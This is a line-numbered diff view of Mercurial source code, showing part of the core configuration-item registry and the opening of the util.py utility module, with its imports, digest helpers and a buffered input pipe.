781 784 coreconfigitem('merge-tools', br'.*\.symlink$',
782 785 default=False,
783 786 generic=True,
784 787 priority=-1,
785 788 )
786 789 coreconfigitem('pager', 'attend-.*',
787 790 default=dynamicdefault,
788 791 generic=True,
789 792 )
790 793 coreconfigitem('pager', 'ignore',
791 794 default=list,
792 795 )
793 796 coreconfigitem('pager', 'pager',
794 797 default=dynamicdefault,
795 798 )
796 799 coreconfigitem('patch', 'eol',
797 800 default='strict',
798 801 )
799 802 coreconfigitem('patch', 'fuzz',
800 803 default=2,
801 804 )
802 805 coreconfigitem('paths', 'default',
803 806 default=None,
804 807 )
805 808 coreconfigitem('paths', 'default-push',
806 809 default=None,
807 810 )
808 811 coreconfigitem('paths', '.*',
809 812 default=None,
810 813 generic=True,
811 814 )
812 815 coreconfigitem('phases', 'checksubrepos',
813 816 default='follow',
814 817 )
815 818 coreconfigitem('phases', 'new-commit',
816 819 default='draft',
817 820 )
818 821 coreconfigitem('phases', 'publish',
819 822 default=True,
820 823 )
821 824 coreconfigitem('profiling', 'enabled',
822 825 default=False,
823 826 )
824 827 coreconfigitem('profiling', 'format',
825 828 default='text',
826 829 )
827 830 coreconfigitem('profiling', 'freq',
828 831 default=1000,
829 832 )
830 833 coreconfigitem('profiling', 'limit',
831 834 default=30,
832 835 )
833 836 coreconfigitem('profiling', 'nested',
834 837 default=0,
835 838 )
836 839 coreconfigitem('profiling', 'output',
837 840 default=None,
838 841 )
839 842 coreconfigitem('profiling', 'showmax',
840 843 default=0.999,
841 844 )
842 845 coreconfigitem('profiling', 'showmin',
843 846 default=dynamicdefault,
844 847 )
845 848 coreconfigitem('profiling', 'sort',
846 849 default='inlinetime',
847 850 )
848 851 coreconfigitem('profiling', 'statformat',
849 852 default='hotpath',
850 853 )
851 854 coreconfigitem('profiling', 'type',
852 855 default='stat',
853 856 )
854 857 coreconfigitem('progress', 'assume-tty',
855 858 default=False,
856 859 )
857 860 coreconfigitem('progress', 'changedelay',
858 861 default=1,
859 862 )
860 863 coreconfigitem('progress', 'clear-complete',
861 864 default=True,
862 865 )
863 866 coreconfigitem('progress', 'debug',
864 867 default=False,
865 868 )
866 869 coreconfigitem('progress', 'delay',
867 870 default=3,
868 871 )
869 872 coreconfigitem('progress', 'disable',
870 873 default=False,
871 874 )
872 875 coreconfigitem('progress', 'estimateinterval',
873 876 default=60.0,
874 877 )
875 878 coreconfigitem('progress', 'format',
876 879 default=lambda: ['topic', 'bar', 'number', 'estimate'],
877 880 )
878 881 coreconfigitem('progress', 'refresh',
879 882 default=0.1,
880 883 )
881 884 coreconfigitem('progress', 'width',
882 885 default=dynamicdefault,
883 886 )
884 887 coreconfigitem('push', 'pushvars.server',
885 888 default=False,
886 889 )
887 890 coreconfigitem('server', 'bookmarks-pushkey-compat',
888 891 default=True,
889 892 )
890 893 coreconfigitem('server', 'bundle1',
891 894 default=True,
892 895 )
893 896 coreconfigitem('server', 'bundle1gd',
894 897 default=None,
895 898 )
896 899 coreconfigitem('server', 'bundle1.pull',
897 900 default=None,
898 901 )
899 902 coreconfigitem('server', 'bundle1gd.pull',
900 903 default=None,
901 904 )
902 905 coreconfigitem('server', 'bundle1.push',
903 906 default=None,
904 907 )
905 908 coreconfigitem('server', 'bundle1gd.push',
906 909 default=None,
907 910 )
908 911 coreconfigitem('server', 'compressionengines',
909 912 default=list,
910 913 )
911 914 coreconfigitem('server', 'concurrent-push-mode',
912 915 default='strict',
913 916 )
914 917 coreconfigitem('server', 'disablefullbundle',
915 918 default=False,
916 919 )
917 920 coreconfigitem('server', 'maxhttpheaderlen',
918 921 default=1024,
919 922 )
920 923 coreconfigitem('server', 'preferuncompressed',
921 924 default=False,
922 925 )
923 926 coreconfigitem('server', 'uncompressed',
924 927 default=True,
925 928 )
926 929 coreconfigitem('server', 'uncompressedallowsecret',
927 930 default=False,
928 931 )
929 932 coreconfigitem('server', 'validate',
930 933 default=False,
931 934 )
932 935 coreconfigitem('server', 'zliblevel',
933 936 default=-1,
934 937 )
935 938 coreconfigitem('share', 'pool',
936 939 default=None,
937 940 )
938 941 coreconfigitem('share', 'poolnaming',
939 942 default='identity',
940 943 )
941 944 coreconfigitem('smtp', 'host',
942 945 default=None,
943 946 )
944 947 coreconfigitem('smtp', 'local_hostname',
945 948 default=None,
946 949 )
947 950 coreconfigitem('smtp', 'password',
948 951 default=None,
949 952 )
950 953 coreconfigitem('smtp', 'port',
951 954 default=dynamicdefault,
952 955 )
953 956 coreconfigitem('smtp', 'tls',
954 957 default='none',
955 958 )
956 959 coreconfigitem('smtp', 'username',
957 960 default=None,
958 961 )
959 962 coreconfigitem('sparse', 'missingwarning',
960 963 default=True,
961 964 )
962 965 coreconfigitem('subrepos', 'allowed',
963 966 default=dynamicdefault, # to make backporting simpler
964 967 )
965 968 coreconfigitem('subrepos', 'hg:allowed',
966 969 default=dynamicdefault,
967 970 )
968 971 coreconfigitem('subrepos', 'git:allowed',
969 972 default=dynamicdefault,
970 973 )
971 974 coreconfigitem('subrepos', 'svn:allowed',
972 975 default=dynamicdefault,
973 976 )
974 977 coreconfigitem('templates', '.*',
975 978 default=None,
976 979 generic=True,
977 980 )
978 981 coreconfigitem('trusted', 'groups',
979 982 default=list,
980 983 )
981 984 coreconfigitem('trusted', 'users',
982 985 default=list,
983 986 )
984 987 coreconfigitem('ui', '_usedassubrepo',
985 988 default=False,
986 989 )
987 990 coreconfigitem('ui', 'allowemptycommit',
988 991 default=False,
989 992 )
990 993 coreconfigitem('ui', 'archivemeta',
991 994 default=True,
992 995 )
993 996 coreconfigitem('ui', 'askusername',
994 997 default=False,
995 998 )
996 999 coreconfigitem('ui', 'clonebundlefallback',
997 1000 default=False,
998 1001 )
999 1002 coreconfigitem('ui', 'clonebundleprefers',
1000 1003 default=list,
1001 1004 )
1002 1005 coreconfigitem('ui', 'clonebundles',
1003 1006 default=True,
1004 1007 )
1005 1008 coreconfigitem('ui', 'color',
1006 1009 default='auto',
1007 1010 )
1008 1011 coreconfigitem('ui', 'commitsubrepos',
1009 1012 default=False,
1010 1013 )
1011 1014 coreconfigitem('ui', 'debug',
1012 1015 default=False,
1013 1016 )
1014 1017 coreconfigitem('ui', 'debugger',
1015 1018 default=None,
1016 1019 )
1017 1020 coreconfigitem('ui', 'editor',
1018 1021 default=dynamicdefault,
1019 1022 )
1020 1023 coreconfigitem('ui', 'fallbackencoding',
1021 1024 default=None,
1022 1025 )
1023 1026 coreconfigitem('ui', 'forcecwd',
1024 1027 default=None,
1025 1028 )
1026 1029 coreconfigitem('ui', 'forcemerge',
1027 1030 default=None,
1028 1031 )
1029 1032 coreconfigitem('ui', 'formatdebug',
1030 1033 default=False,
1031 1034 )
1032 1035 coreconfigitem('ui', 'formatjson',
1033 1036 default=False,
1034 1037 )
1035 1038 coreconfigitem('ui', 'formatted',
1036 1039 default=None,
1037 1040 )
1038 1041 coreconfigitem('ui', 'graphnodetemplate',
1039 1042 default=None,
1040 1043 )
1041 1044 coreconfigitem('ui', 'interactive',
1042 1045 default=None,
1043 1046 )
1044 1047 coreconfigitem('ui', 'interface',
1045 1048 default=None,
1046 1049 )
1047 1050 coreconfigitem('ui', 'interface.chunkselector',
1048 1051 default=None,
1049 1052 )
1050 1053 coreconfigitem('ui', 'logblockedtimes',
1051 1054 default=False,
1052 1055 )
1053 1056 coreconfigitem('ui', 'logtemplate',
1054 1057 default=None,
1055 1058 )
1056 1059 coreconfigitem('ui', 'merge',
1057 1060 default=None,
1058 1061 )
1059 1062 coreconfigitem('ui', 'mergemarkers',
1060 1063 default='basic',
1061 1064 )
1062 1065 coreconfigitem('ui', 'mergemarkertemplate',
1063 1066 default=('{node|short} '
1064 1067 '{ifeq(tags, "tip", "", '
1065 1068 'ifeq(tags, "", "", "{tags} "))}'
1066 1069 '{if(bookmarks, "{bookmarks} ")}'
1067 1070 '{ifeq(branch, "default", "", "{branch} ")}'
1068 1071 '- {author|user}: {desc|firstline}')
1069 1072 )
1070 1073 coreconfigitem('ui', 'nontty',
1071 1074 default=False,
1072 1075 )
1073 1076 coreconfigitem('ui', 'origbackuppath',
1074 1077 default=None,
1075 1078 )
1076 1079 coreconfigitem('ui', 'paginate',
1077 1080 default=True,
1078 1081 )
1079 1082 coreconfigitem('ui', 'patch',
1080 1083 default=None,
1081 1084 )
1082 1085 coreconfigitem('ui', 'portablefilenames',
1083 1086 default='warn',
1084 1087 )
1085 1088 coreconfigitem('ui', 'promptecho',
1086 1089 default=False,
1087 1090 )
1088 1091 coreconfigitem('ui', 'quiet',
1089 1092 default=False,
1090 1093 )
1091 1094 coreconfigitem('ui', 'quietbookmarkmove',
1092 1095 default=False,
1093 1096 )
1094 1097 coreconfigitem('ui', 'remotecmd',
1095 1098 default='hg',
1096 1099 )
1097 1100 coreconfigitem('ui', 'report_untrusted',
1098 1101 default=True,
1099 1102 )
1100 1103 coreconfigitem('ui', 'rollback',
1101 1104 default=True,
1102 1105 )
1103 1106 coreconfigitem('ui', 'slash',
1104 1107 default=False,
1105 1108 )
1106 1109 coreconfigitem('ui', 'ssh',
1107 1110 default='ssh',
1108 1111 )
1109 1112 coreconfigitem('ui', 'ssherrorhint',
1110 1113 default=None,
1111 1114 )
1112 1115 coreconfigitem('ui', 'statuscopies',
1113 1116 default=False,
1114 1117 )
1115 1118 coreconfigitem('ui', 'strict',
1116 1119 default=False,
1117 1120 )
1118 1121 coreconfigitem('ui', 'style',
1119 1122 default='',
1120 1123 )
1121 1124 coreconfigitem('ui', 'supportcontact',
1122 1125 default=None,
1123 1126 )
1124 1127 coreconfigitem('ui', 'textwidth',
1125 1128 default=78,
1126 1129 )
1127 1130 coreconfigitem('ui', 'timeout',
1128 1131 default='600',
1129 1132 )
1130 1133 coreconfigitem('ui', 'timeout.warn',
1131 1134 default=0,
1132 1135 )
1133 1136 coreconfigitem('ui', 'traceback',
1134 1137 default=False,
1135 1138 )
1136 1139 coreconfigitem('ui', 'tweakdefaults',
1137 1140 default=False,
1138 1141 )
1139 1142 coreconfigitem('ui', 'username',
1140 1143 alias=[('ui', 'user')]
1141 1144 )
1142 1145 coreconfigitem('ui', 'verbose',
1143 1146 default=False,
1144 1147 )
1145 1148 coreconfigitem('verify', 'skipflags',
1146 1149 default=None,
1147 1150 )
1148 1151 coreconfigitem('web', 'allowbz2',
1149 1152 default=False,
1150 1153 )
1151 1154 coreconfigitem('web', 'allowgz',
1152 1155 default=False,
1153 1156 )
1154 1157 coreconfigitem('web', 'allow-pull',
1155 1158 alias=[('web', 'allowpull')],
1156 1159 default=True,
1157 1160 )
1158 1161 coreconfigitem('web', 'allow-push',
1159 1162 alias=[('web', 'allow_push')],
1160 1163 default=list,
1161 1164 )
1162 1165 coreconfigitem('web', 'allowzip',
1163 1166 default=False,
1164 1167 )
1165 1168 coreconfigitem('web', 'archivesubrepos',
1166 1169 default=False,
1167 1170 )
1168 1171 coreconfigitem('web', 'cache',
1169 1172 default=True,
1170 1173 )
1171 1174 coreconfigitem('web', 'contact',
1172 1175 default=None,
1173 1176 )
1174 1177 coreconfigitem('web', 'deny_push',
1175 1178 default=list,
1176 1179 )
1177 1180 coreconfigitem('web', 'guessmime',
1178 1181 default=False,
1179 1182 )
1180 1183 coreconfigitem('web', 'hidden',
1181 1184 default=False,
1182 1185 )
1183 1186 coreconfigitem('web', 'labels',
1184 1187 default=list,
1185 1188 )
1186 1189 coreconfigitem('web', 'logoimg',
1187 1190 default='hglogo.png',
1188 1191 )
1189 1192 coreconfigitem('web', 'logourl',
1190 1193 default='https://mercurial-scm.org/',
1191 1194 )
1192 1195 coreconfigitem('web', 'accesslog',
1193 1196 default='-',
1194 1197 )
1195 1198 coreconfigitem('web', 'address',
1196 1199 default='',
1197 1200 )
1198 1201 coreconfigitem('web', 'allow_archive',
1199 1202 default=list,
1200 1203 )
1201 1204 coreconfigitem('web', 'allow_read',
1202 1205 default=list,
1203 1206 )
1204 1207 coreconfigitem('web', 'baseurl',
1205 1208 default=None,
1206 1209 )
1207 1210 coreconfigitem('web', 'cacerts',
1208 1211 default=None,
1209 1212 )
1210 1213 coreconfigitem('web', 'certificate',
1211 1214 default=None,
1212 1215 )
1213 1216 coreconfigitem('web', 'collapse',
1214 1217 default=False,
1215 1218 )
1216 1219 coreconfigitem('web', 'csp',
1217 1220 default=None,
1218 1221 )
1219 1222 coreconfigitem('web', 'deny_read',
1220 1223 default=list,
1221 1224 )
1222 1225 coreconfigitem('web', 'descend',
1223 1226 default=True,
1224 1227 )
1225 1228 coreconfigitem('web', 'description',
1226 1229 default="",
1227 1230 )
1228 1231 coreconfigitem('web', 'encoding',
1229 1232 default=lambda: encoding.encoding,
1230 1233 )
1231 1234 coreconfigitem('web', 'errorlog',
1232 1235 default='-',
1233 1236 )
1234 1237 coreconfigitem('web', 'ipv6',
1235 1238 default=False,
1236 1239 )
1237 1240 coreconfigitem('web', 'maxchanges',
1238 1241 default=10,
1239 1242 )
1240 1243 coreconfigitem('web', 'maxfiles',
1241 1244 default=10,
1242 1245 )
1243 1246 coreconfigitem('web', 'maxshortchanges',
1244 1247 default=60,
1245 1248 )
1246 1249 coreconfigitem('web', 'motd',
1247 1250 default='',
1248 1251 )
1249 1252 coreconfigitem('web', 'name',
1250 1253 default=dynamicdefault,
1251 1254 )
1252 1255 coreconfigitem('web', 'port',
1253 1256 default=8000,
1254 1257 )
1255 1258 coreconfigitem('web', 'prefix',
1256 1259 default='',
1257 1260 )
1258 1261 coreconfigitem('web', 'push_ssl',
1259 1262 default=True,
1260 1263 )
1261 1264 coreconfigitem('web', 'refreshinterval',
1262 1265 default=20,
1263 1266 )
1264 1267 coreconfigitem('web', 'server-header',
1265 1268 default=None,
1266 1269 )
1267 1270 coreconfigitem('web', 'staticurl',
1268 1271 default=None,
1269 1272 )
1270 1273 coreconfigitem('web', 'stripes',
1271 1274 default=1,
1272 1275 )
1273 1276 coreconfigitem('web', 'style',
1274 1277 default='paper',
1275 1278 )
1276 1279 coreconfigitem('web', 'templates',
1277 1280 default=None,
1278 1281 )
1279 1282 coreconfigitem('web', 'view',
1280 1283 default='served',
1281 1284 )
1282 1285 coreconfigitem('worker', 'backgroundclose',
1283 1286 default=dynamicdefault,
1284 1287 )
1285 1288 # Windows defaults to a limit of 512 open files. A buffer of 128
1286 1289 # should give us enough headway.
1287 1290 coreconfigitem('worker', 'backgroundclosemaxqueue',
1288 1291 default=384,
1289 1292 )
1290 1293 coreconfigitem('worker', 'backgroundcloseminfilecount',
1291 1294 default=2048,
1292 1295 )
1293 1296 coreconfigitem('worker', 'backgroundclosethreadcount',
1294 1297 default=4,
1295 1298 )
1296 1299 coreconfigitem('worker', 'enabled',
1297 1300 default=True,
1298 1301 )
1299 1302 coreconfigitem('worker', 'numcpus',
1300 1303 default=None,
1301 1304 )
1302 1305
1303 1306 # Rebase related configuration moved to core because other extension are doing
1304 1307 # strange things. For example, shelve import the extensions to reuse some bit
1305 1308 # without formally loading it.
1306 1309 coreconfigitem('commands', 'rebase.requiredest',
1307 1310 default=False,
1308 1311 )
1309 1312 coreconfigitem('experimental', 'rebaseskipobsolete',
1310 1313 default=True,
1311 1314 )
1312 1315 coreconfigitem('rebase', 'singletransaction',
1313 1316 default=False,
1314 1317 )
1315 1318 coreconfigitem('rebase', 'experimental.inmemory',
1316 1319 default=False,
1317 1320 )
@@ -1,4365 +1,4373 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 def isatty(fp):
87 87 try:
88 88 return fp.isatty()
89 89 except AttributeError:
90 90 return False
91 91
92 92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 94 # buffering
95 95 if isatty(stdout):
96 96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97 97
98 98 if pycompat.iswindows:
99 99 from . import windows as platform
100 100 stdout = platform.winstdout(stdout)
101 101 else:
102 102 from . import posix as platform
103 103
104 104 _ = i18n._
105 105
106 106 bindunixsocket = platform.bindunixsocket
107 107 cachestat = platform.cachestat
108 108 checkexec = platform.checkexec
109 109 checklink = platform.checklink
110 110 copymode = platform.copymode
111 111 executablepath = platform.executablepath
112 112 expandglobs = platform.expandglobs
113 113 explainexit = platform.explainexit
114 114 findexe = platform.findexe
115 115 getfsmountpoint = platform.getfsmountpoint
116 116 getfstype = platform.getfstype
117 117 gethgcmd = platform.gethgcmd
118 118 getuser = platform.getuser
119 119 getpid = os.getpid
120 120 groupmembers = platform.groupmembers
121 121 groupname = platform.groupname
122 122 hidewindow = platform.hidewindow
123 123 isexec = platform.isexec
124 124 isowner = platform.isowner
125 125 listdir = osutil.listdir
126 126 localpath = platform.localpath
127 127 lookupreg = platform.lookupreg
128 128 makedir = platform.makedir
129 129 nlinks = platform.nlinks
130 130 normpath = platform.normpath
131 131 normcase = platform.normcase
132 132 normcasespec = platform.normcasespec
133 133 normcasefallback = platform.normcasefallback
134 134 openhardlinks = platform.openhardlinks
135 135 oslink = platform.oslink
136 136 parsepatchoutput = platform.parsepatchoutput
137 137 pconvert = platform.pconvert
138 138 poll = platform.poll
139 139 popen = platform.popen
140 140 posixfile = platform.posixfile
141 141 quotecommand = platform.quotecommand
142 142 readpipe = platform.readpipe
143 143 rename = platform.rename
144 144 removedirs = platform.removedirs
145 145 samedevice = platform.samedevice
146 146 samefile = platform.samefile
147 147 samestat = platform.samestat
148 148 setbinary = platform.setbinary
149 149 setflags = platform.setflags
150 150 setsignalhandler = platform.setsignalhandler
151 151 shellquote = platform.shellquote
152 152 shellsplit = platform.shellsplit
153 153 spawndetached = platform.spawndetached
154 154 split = platform.split
155 155 sshargs = platform.sshargs
156 156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
157 157 statisexec = platform.statisexec
158 158 statislink = platform.statislink
159 159 testpid = platform.testpid
160 160 umask = platform.umask
161 161 unlink = platform.unlink
162 162 username = platform.username
163 163
164 164 try:
165 165 recvfds = osutil.recvfds
166 166 except AttributeError:
167 167 pass
168 168 try:
169 169 setprocname = osutil.setprocname
170 170 except AttributeError:
171 171 pass
172 172 try:
173 173 unblocksignal = osutil.unblocksignal
174 174 except AttributeError:
175 175 pass
176 176
177 177 # Python compatibility
178 178
179 179 _notset = object()
180 180
181 181 def safehasattr(thing, attr):
182 182 return getattr(thing, attr, _notset) is not _notset
183 183
184 184 def _rapply(f, xs):
185 185 if xs is None:
186 186 # assume None means non-value of optional data
187 187 return xs
188 188 if isinstance(xs, (list, set, tuple)):
189 189 return type(xs)(_rapply(f, x) for x in xs)
190 190 if isinstance(xs, dict):
191 191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 192 return f(xs)
193 193
194 194 def rapply(f, xs):
195 195 """Apply function recursively to every item preserving the data structure
196 196
197 197 >>> def f(x):
198 198 ... return 'f(%s)' % x
199 199 >>> rapply(f, None) is None
200 200 True
201 201 >>> rapply(f, 'a')
202 202 'f(a)'
203 203 >>> rapply(f, {'a'}) == {'f(a)'}
204 204 True
205 205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
206 206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
207 207
208 208 >>> xs = [object()]
209 209 >>> rapply(pycompat.identity, xs) is xs
210 210 True
211 211 """
212 212 if f is pycompat.identity:
213 213 # fast path mainly for py2
214 214 return xs
215 215 return _rapply(f, xs)
216 216
217 217 def bitsfrom(container):
218 218 bits = 0
219 219 for bit in container:
220 220 bits |= bit
221 221 return bits
222 222
223 223 # python 2.6 still have deprecation warning enabled by default. We do not want
224 224 # to display anything to standard user so detect if we are running test and
225 225 # only use python deprecation warning in this case.
226 226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
227 227 if _dowarn:
228 228 # explicitly unfilter our warning for python 2.7
229 229 #
230 230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
231 231 # However, module name set through PYTHONWARNINGS was exactly matched, so
232 232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
233 233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
235 235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
236 236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
237 237 if _dowarn and pycompat.ispy3:
238 238 # silence warning emitted by passing user string to re.sub()
239 239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
240 240 r'mercurial')
241 241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
242 242 DeprecationWarning, r'mercurial')
243 243
244 244 def nouideprecwarn(msg, version, stacklevel=1):
245 245 """Issue an python native deprecation warning
246 246
247 247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
248 248 """
249 249 if _dowarn:
250 250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
251 251 " update your code.)") % version
252 252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253 253
254 254 DIGESTS = {
255 255 'md5': hashlib.md5,
256 256 'sha1': hashlib.sha1,
257 257 'sha512': hashlib.sha512,
258 258 }
259 259 # List of digest types from strongest to weakest
260 260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
261 261
262 262 for k in DIGESTS_BY_STRENGTH:
263 263 assert k in DIGESTS
264 264
265 265 class digester(object):
266 266 """helper to compute digests.
267 267
268 268 This helper can be used to compute one or more digests given their name.
269 269
270 270 >>> d = digester([b'md5', b'sha1'])
271 271 >>> d.update(b'foo')
272 272 >>> [k for k in sorted(d)]
273 273 ['md5', 'sha1']
274 274 >>> d[b'md5']
275 275 'acbd18db4cc2f85cedef654fccc4a4d8'
276 276 >>> d[b'sha1']
277 277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
278 278 >>> digester.preferred([b'md5', b'sha1'])
279 279 'sha1'
280 280 """
281 281
282 282 def __init__(self, digests, s=''):
283 283 self._hashes = {}
284 284 for k in digests:
285 285 if k not in DIGESTS:
286 286 raise Abort(_('unknown digest type: %s') % k)
287 287 self._hashes[k] = DIGESTS[k]()
288 288 if s:
289 289 self.update(s)
290 290
291 291 def update(self, data):
292 292 for h in self._hashes.values():
293 293 h.update(data)
294 294
295 295 def __getitem__(self, key):
296 296 if key not in DIGESTS:
297 297 raise Abort(_('unknown digest type: %s') % k)
298 298 return nodemod.hex(self._hashes[key].digest())
299 299
300 300 def __iter__(self):
301 301 return iter(self._hashes)
302 302
303 303 @staticmethod
304 304 def preferred(supported):
305 305 """returns the strongest digest type in both supported and DIGESTS."""
306 306
307 307 for k in DIGESTS_BY_STRENGTH:
308 308 if k in supported:
309 309 return k
310 310 return None
311 311
312 312 class digestchecker(object):
313 313 """file handle wrapper that additionally checks content against a given
314 314 size and digests.
315 315
316 316 d = digestchecker(fh, size, {'md5': '...'})
317 317
318 318 When multiple digests are given, all of them are validated.
319 319 """
320 320
321 321 def __init__(self, fh, size, digests):
322 322 self._fh = fh
323 323 self._size = size
324 324 self._got = 0
325 325 self._digests = dict(digests)
326 326 self._digester = digester(self._digests.keys())
327 327
328 328 def read(self, length=-1):
329 329 content = self._fh.read(length)
330 330 self._digester.update(content)
331 331 self._got += len(content)
332 332 return content
333 333
334 334 def validate(self):
335 335 if self._size != self._got:
336 336 raise Abort(_('size mismatch: expected %d, got %d') %
337 337 (self._size, self._got))
338 338 for k, v in self._digests.items():
339 339 if v != self._digester[k]:
340 340 # i18n: first parameter is a digest name
341 341 raise Abort(_('%s mismatch: expected %s, got %s') %
342 342 (k, v, self._digester[k]))
343 343
344 344 try:
345 345 buffer = buffer
346 346 except NameError:
347 347 def buffer(sliceable, offset=0, length=None):
348 348 if length is not None:
349 349 return memoryview(sliceable)[offset:offset + length]
350 350 return memoryview(sliceable)[offset:]
351 351
352 352 closefds = pycompat.isposix
353 353
354 354 _chunksize = 4096
355 355
356 356 class bufferedinputpipe(object):
357 357 """a manually buffered input pipe
358 358
359 359 Python will not let us use buffered IO and lazy reading with 'polling' at
360 360 the same time. We cannot probe the buffer state and select will not detect
361 361 that data are ready to read if they are already buffered.
362 362
363 363 This class let us work around that by implementing its own buffering
364 364 (allowing efficient readline) while offering a way to know if the buffer is
365 365 empty from the output (allowing collaboration of the buffer with polling).
366 366
367 367 This class lives in the 'util' module because it makes use of the 'os'
368 368 module from the python stdlib.
369 369 """
370 370 def __new__(cls, fh):
371 371 # If we receive a fileobjectproxy, we need to use a variation of this
372 372 # class that notifies observers about activity.
373 373 if isinstance(fh, fileobjectproxy):
374 374 cls = observedbufferedinputpipe
375 375
376 376 return super(bufferedinputpipe, cls).__new__(cls)
377 377
378 378 def __init__(self, input):
379 379 self._input = input
380 380 self._buffer = []
381 381 self._eof = False
382 382 self._lenbuf = 0
383 383
384 384 @property
385 385 def hasbuffer(self):
386 386 """True is any data is currently buffered
387 387
388 388 This will be used externally a pre-step for polling IO. If there is
389 389 already data then no polling should be set in place."""
390 390 return bool(self._buffer)
391 391
392 392 @property
393 393 def closed(self):
394 394 return self._input.closed
395 395
396 396 def fileno(self):
397 397 return self._input.fileno()
398 398
399 399 def close(self):
400 400 return self._input.close()
401 401
402 402 def read(self, size):
403 403 while (not self._eof) and (self._lenbuf < size):
404 404 self._fillbuffer()
405 405 return self._frombuffer(size)
406 406
407 407 def readline(self, *args, **kwargs):
408 408 if 1 < len(self._buffer):
409 409 # this should not happen because both read and readline end with a
410 410 # _frombuffer call that collapse it.
411 411 self._buffer = [''.join(self._buffer)]
412 412 self._lenbuf = len(self._buffer[0])
413 413 lfi = -1
414 414 if self._buffer:
415 415 lfi = self._buffer[-1].find('\n')
416 416 while (not self._eof) and lfi < 0:
417 417 self._fillbuffer()
418 418 if self._buffer:
419 419 lfi = self._buffer[-1].find('\n')
420 420 size = lfi + 1
421 421 if lfi < 0: # end of file
422 422 size = self._lenbuf
423 423 elif 1 < len(self._buffer):
424 424 # we need to take previous chunks into account
425 425 size += self._lenbuf - len(self._buffer[-1])
426 426 return self._frombuffer(size)
427 427
428 428 def _frombuffer(self, size):
429 429 """return at most 'size' data from the buffer
430 430
431 431 The data are removed from the buffer."""
432 432 if size == 0 or not self._buffer:
433 433 return ''
434 434 buf = self._buffer[0]
435 435 if 1 < len(self._buffer):
436 436 buf = ''.join(self._buffer)
437 437
438 438 data = buf[:size]
439 439 buf = buf[len(data):]
440 440 if buf:
441 441 self._buffer = [buf]
442 442 self._lenbuf = len(buf)
443 443 else:
444 444 self._buffer = []
445 445 self._lenbuf = 0
446 446 return data
447 447
448 448 def _fillbuffer(self):
449 449 """read data to the buffer"""
450 450 data = os.read(self._input.fileno(), _chunksize)
451 451 if not data:
452 452 self._eof = True
453 453 else:
454 454 self._lenbuf += len(data)
455 455 self._buffer.append(data)
456 456
457 457 return data
458 458
459 459 def mmapread(fp):
460 460 try:
461 461 fd = getattr(fp, 'fileno', lambda: fp)()
462 462 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
463 463 except ValueError:
464 464 # Empty files cannot be mmapped, but mmapread should still work. Check
465 465 # if the file is empty, and if so, return an empty buffer.
466 466 if os.fstat(fd).st_size == 0:
467 467 return ''
468 468 raise
469 469
470 470 def popen2(cmd, env=None, newlines=False):
471 471 # Setting bufsize to -1 lets the system decide the buffer size.
472 472 # The default for bufsize is 0, meaning unbuffered. This leads to
473 473 # poor performance on Mac OS X: http://bugs.python.org/issue4194
474 474 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
475 475 close_fds=closefds,
476 476 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
477 477 universal_newlines=newlines,
478 478 env=env)
